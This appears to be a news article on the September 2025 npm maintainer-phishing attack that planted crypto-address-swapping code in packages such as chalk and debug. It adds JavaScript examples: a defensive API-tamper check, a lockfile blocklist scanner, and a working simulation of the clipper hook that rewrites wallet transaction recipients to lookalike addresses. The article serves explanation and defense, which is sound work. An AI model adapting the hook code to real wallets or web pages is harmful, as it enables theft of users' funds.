
Massive NPM Supply-Chain Attack Exposes Crypto Wallets to Theft in Bold Phishing Scheme

The JavaScript ecosystem was hit by one of its biggest supply-chain incidents on Sept. 8, 2025, when a phished maintainer account pushed malicious updates to at least 18 popular npm packages, including chalk and debug, that collectively see roughly 2 billion weekly downloads.

The payload targeted crypto users by intercepting on-page wallet calls and swapping destination addresses.

How it happened

Investigators say the attacker impersonated npm support using the npmjs.help domain and a fake 2FA reset workflow to seize the account of prolific maintainer Qix (Josh Junon).

With access, the actor rapidly published tainted versions across a cluster of utilities (e.g., ansi-regex, strip-ansi, supports-color, wrap-ansi), before the breach was spotted and reversions began. Qix acknowledged the compromise publicly and said cleanup was underway.

Why crypto was in the crosshairs

The malware only runs in a browser context: it first checks that a window object exists, then hooks window.fetch, XMLHttpRequest, and Web3 wallet APIs such as window.ethereum.request, giving it a view of both ordinary web traffic and wallet transaction requests.

From there, it replaces the recipient address with the attacker-controlled address that is closest to it by Levenshtein distance, so the substitute looks plausible at a glance. This is a classic "clipper" move aimed at draining wallets through dapp and exchange front-ends.
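To make the mechanism concrete, here is an added example (written for this article, not the malware's own code) that models the address swap as described above and one way a dapp can detect that its wallet or network APIs have been replaced. The attacker pool, the intended address and the fake window object are constructed sample values, not real wallets; the hook is installed on a simulated provider so the whole thing runs under Node without a browser.

```javascript
// Added example: models the Levenshtein-based address swap the article describes
// and a reference-identity check that catches replaced browser/wallet APIs.
// All addresses below are constructed sample values, not real wallets.

// Levenshtein edit distance between two strings (single-row dynamic programming).
function levenshtein(a, b) {
  const prev = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = prev[0];
    prev[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const tmp = prev[j];
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      prev[j] = Math.min(prev[j] + 1, prev[j - 1] + 1, diag + cost);
      diag = tmp;
    }
  }
  return prev[b.length];
}

// The clipper's choice: the attacker-controlled address that is fewest edits away
// from the victim's intended address, so a quick visual check still passes.
function nearestLookalike(original, pool) {
  let best = pool[0];
  let bestDist = Infinity;
  for (const candidate of pool) {
    const d = levenshtein(original.toLowerCase(), candidate.toLowerCase());
    if (d < bestDist) { best = candidate; bestDist = d; }
  }
  return best;
}

// Rewrite every EVM-style address in a text payload, as a fetch/XHR hook would.
const ETH_ADDRESS = /0x[0-9a-fA-F]{40}/g;
function swapAddresses(payload, pool) {
  return payload.replace(ETH_ADDRESS, (m) => nearestLookalike(m, pool));
}

// Simulated hook on a wallet provider: eth_sendTransaction's "to" is rewritten
// before the real request method ever sees it.
function installMaliciousHook(provider, pool) {
  const real = provider.request.bind(provider);
  provider.request = (args) => {
    if (args.method === 'eth_sendTransaction' && args.params?.[0]?.to) {
      args.params[0].to = nearestLookalike(args.params[0].to, pool);
    }
    return real(args);
  };
}

// Defensive check: capture the API references before any third-party bundle runs,
// then compare later. A replaced function is a different object.
function snapshotApis(win) {
  return {
    fetch: win.fetch,
    xhrOpen: win.XMLHttpRequest?.prototype?.open,
    xhrSend: win.XMLHttpRequest?.prototype?.send,
    ethRequest: win.ethereum?.request,
  };
}
function tamperedApis(win, snapshot) {
  const now = snapshotApis(win);
  return Object.keys(snapshot).filter((k) => snapshot[k] !== now[k]);
}

// Constructed sample data (not real addresses).
const ATTACKER_POOL = [
  '0x1111111111111111111111111111111111111111',
  '0xAbCd000000000000000000000000000000000001',
  '0x9999999999999999999999999999999999999999',
];
const INTENDED_TO = '0xAbCd000000000000000000000000000000000000';

// Stand-in for a browser window: snapshot, get hooked, send, then check.
function demo() {
  const seen = [];
  const win = {
    fetch: function fetch() {},
    XMLHttpRequest: class { open() {} send() {} },
    ethereum: { request: async (args) => { seen.push(args); return '0xtxhash'; } },
  };
  const baseline = snapshotApis(win);
  installMaliciousHook(win.ethereum, ATTACKER_POOL);
  win.ethereum.request({ method: 'eth_sendTransaction', params: [{ to: INTENDED_TO, value: '0x1' }] });
  return { hooked: tamperedApis(win, baseline), sentTo: seen[0].params[0].to };
}

if (typeof require !== 'undefined' && require.main === module) console.log(demo());
```

The identity snapshot only catches hooks installed after the snapshot is taken, so it belongs in a first-party script that runs before any bundled dependency; a payload that loads earlier, or that patches the snapshot function itself, slips past it. That is why the on-device address check on a hardware wallet, described later in this article, remains the ground truth.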

The campaign broadened

Within hours, the same wallet-drainer surfaced via a second compromised maintainer, extending risk to packages such as @duckdb/node-api, duckdb, and prebid. That expansion underscores the blast radius when trusted publishers are hijacked.

Crypto industry response

Ledger CTO Charles Guillemet warned users that the malware swaps addresses silently and urged on-device verification (clear-signing) before approving any transaction.

Security firms have published technical breakdowns and IOCs, while maintainers have reverted or deprecated bad builds. Separately, but relevant for risk posture, the Aug. 26 “s1ngularity”/Nx incident leaked developer secrets via compromised npm releases, illustrating how stolen tokens can seed follow-on package takeovers like this week’s wave.

What it means for web3 teams & users

  • If you build dapps or wallet UIs: Audit lockfiles for the exact bad versions listed in current advisories; rebuild from clean pins, purge caches/CDNs, and redeploy. Search bundles for code that hooks network calls or wallet APIs and alters addresses.

  • If you’re a crypto user: Prefer a hardware wallet and confirm the on-device address matches what you intended before signing.

  • For security/ops: Rotate npm/GitHub/CI tokens touched during the window; review recent installs and release pipelines. If you use Nx, follow the remediation steps in Aikido’s write-up.
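The first step above, checking lockfiles against an advisory's list of bad versions, is easy to get wrong by hand because the same package can appear nested several times. Here is an added example (not the page's code, nor any vendor's tool) of a small Node script that does the check for both modern lockfiles (lockfileVersion 2/3, flat "packages" map) and the older v1 nested "dependencies" layout. The blocklist shown is illustrative, covering only the chalk and debug versions reported at the time; replace it with the full list from the advisory you are acting on. The sample lockfile is constructed for the demonstration.

```javascript
// Added example: flag dependency versions named in an advisory inside package-lock.json.
// Usage: node audit-lock.js package-lock.json   (with no argument, scans the sample below)

// Illustrative blocklist: chalk/debug versions reported in the advisories at the time.
// Verify and extend against the current advisory before relying on it.
const BAD_VERSIONS = {
  chalk: new Set(['5.6.1']),
  debug: new Set(['4.4.2']),
};

// v2/v3 keys look like "node_modules/chalk" or "node_modules/a/node_modules/chalk";
// scoped packages keep their "@scope/name" segment after the last "node_modules/".
function nameFromPath(p) {
  const idx = p.lastIndexOf('node_modules/');
  return idx === -1 ? p : p.slice(idx + 'node_modules/'.length);
}

function findBadPackages(lock, blocklist = BAD_VERSIONS) {
  const hits = [];
  if (lock.packages) {
    for (const [p, meta] of Object.entries(lock.packages)) {
      if (!p) continue; // "" is the root project entry, not a dependency
      const name = nameFromPath(p);
      if (blocklist[name]?.has(meta.version)) hits.push({ name, version: meta.version, path: p });
    }
    return hits;
  }
  // v1 lockfiles nest transitive deps under each entry's "dependencies" object.
  const walk = (deps, prefix) => {
    for (const [name, meta] of Object.entries(deps || {})) {
      const p = `${prefix}node_modules/${name}`;
      if (blocklist[name]?.has(meta.version)) hits.push({ name, version: meta.version, path: p });
      walk(meta.dependencies, p + '/');
    }
  };
  walk(lock.dependencies, '');
  return hits;
}

// Constructed sample lockfile (v3 shape): one clean chalk, one flagged debug,
// and a flagged chalk nested under another package where a top-level check misses it.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'sample-dapp', version: '1.0.0' },
    'node_modules/chalk': { version: '5.6.0' },
    'node_modules/debug': { version: '4.4.2' },
    'node_modules/foo/node_modules/chalk': { version: '5.6.1' },
  },
};

function main(argv = process.argv) {
  const file = argv[2];
  const lock = file ? JSON.parse(require('fs').readFileSync(file, 'utf8')) : SAMPLE_LOCK;
  const hits = findBadPackages(lock);
  for (const h of hits) console.log(`FLAGGED ${h.name}@${h.version} at ${h.path}`);
  console.log(hits.length ? `${hits.length} flagged entr${hits.length === 1 ? 'y' : 'ies'}` : 'no flagged versions');
  return hits;
}

if (typeof require !== 'undefined' && require.main === module) main();
```

A hit means the pinned tree resolved a bad build at some point, so a clean rebuild is not enough on its own: the CI cache, the CDN copy of the bundle and any Docker layer that ran npm install during the window also need to be purged, as the checklist above says.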

Bottom line: This is likely the largest npm supply-chain hack to date, and its design expressly targets crypto transactions at the UI layer. Keeping users safe now hinges on rapid rebuilds, strict dependency pinning, and verifying every on-chain action at the hardware wallet screen.

Jerry Rolon

After working for 7 years as an Internet marketer, Jerry now aims to explore the journalistic side of the Internet. With his impeccable knowledge in this domain, he churns out some of the best news articles in the internet niche. With respect to academics, Jerry earned a degree in business from California State University.
